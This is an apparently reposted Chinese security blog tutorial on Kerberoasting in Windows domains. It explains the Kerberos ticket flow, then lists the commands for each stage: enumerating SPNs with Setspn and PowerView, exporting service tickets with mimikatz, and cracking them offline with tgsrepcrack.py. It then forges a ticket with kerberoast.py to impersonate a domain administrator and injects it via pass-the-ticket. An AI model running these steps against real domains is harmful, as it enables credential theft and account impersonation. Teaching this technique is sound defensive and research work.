Kerberoasting——域渗透

admin 2025年2月24日22:23:41评论14 views字数 1348阅读4分29秒阅读模式

声明

以下内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。
长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。

0x01 前言

前一阵刚刚写了kerberos协议的原理,就是为了给后续的几篇文章做一下铺垫,保证大家都能看懂,尽量以简要的话术来描述,欢迎翻阅前面的文章进行查看。

0x02 Kerberoasting

Kerberoasting 是一种在请求访问服务时利用 Kerberos 协议中的弱点的技术。
首先会看以下kerberos认证的流程:
  1. Client想要访问Server的服务时,先要向AS发送能够证明自己身份的验证
  2. 验证通过后AS会给Client发送一个TGT
  3. 随后Client再向TGS去验证自己的身份通过后
  4. TGS会给Client发送一个ST
  5. 最后是Client和Server做双向验证
但是这里需要注意的就是ST(Service Ticket)使用Server的Master Key进行加密的,这也就导致了windows域上的任何经过身份验证的用户都能够从TGS处请求ST,然后进行暴力破解。
一、SPN协议
1.服务主体名称发现
1.1 SPN介绍
SPN是服务实例的唯一标识符。
Kerberos身份认证过程中需要使用SPN,以便将服务实例与服务登录账户相关联。
Windows域环境中的SPN格式如下所示:SERVICE/host.name
1.2 查询SPN:
使用Windows自带的SetSPN.exe工具
Setspn -Q */*   发现存在spn
Kerberoasting——域渗透
随后加载PowerView.ps1
(属于PowerSploit框架和Empire的一部分)Get-NetUser -SPN
Kerberoasting——域渗透
二、票据破解
2.导出票据
2.1  使用:
mimikatz-Kerberos::list /export
Kerberoasting——域渗透
这时桌面上会多出一个rc4加密的票据。
2.2 使用tgsrepcrackck.py破解票据:
将票据传到攻击者计算机开始破解,使用tgsrepcrackck.py开始离线密码破解
或者使用kirbi2john.py从原始票据中提取可破解的哈希格式
python3 tgsrepcrack.py password.txt god.kirbi

0x03票据重写

当票据被破解后,使用kerberoast.py重写票据,这将允许在服务将被访问时模拟任何域用户或伪造账户。
Python3 kerberoast.py -p Password -r 001.kirbi -w 002.kirbi -u 500
最后将新票据重新注入到内存,这样就可以通过kerberos协议对目标服务执行身份认证 Kerberos::ptt 002kirbi

0x04总结

工具链接:
  1. https://github.com/xan7r/kerberoast

  2. https://github.com/PowerShellMafia/PowerSploit/

Kerberoasting——域渗透
Kerberoasting——域渗透
Kerberoasting——域渗透

▇ 扫码关注我们 ▇

长白山攻防实验室

学习最新技术知识

原文始发于微信公众号(长白山攻防实验室):Kerberoasting——域渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月24日22:23:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Kerberoasting——域渗透https://cn-sec.com/archives/1076382.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息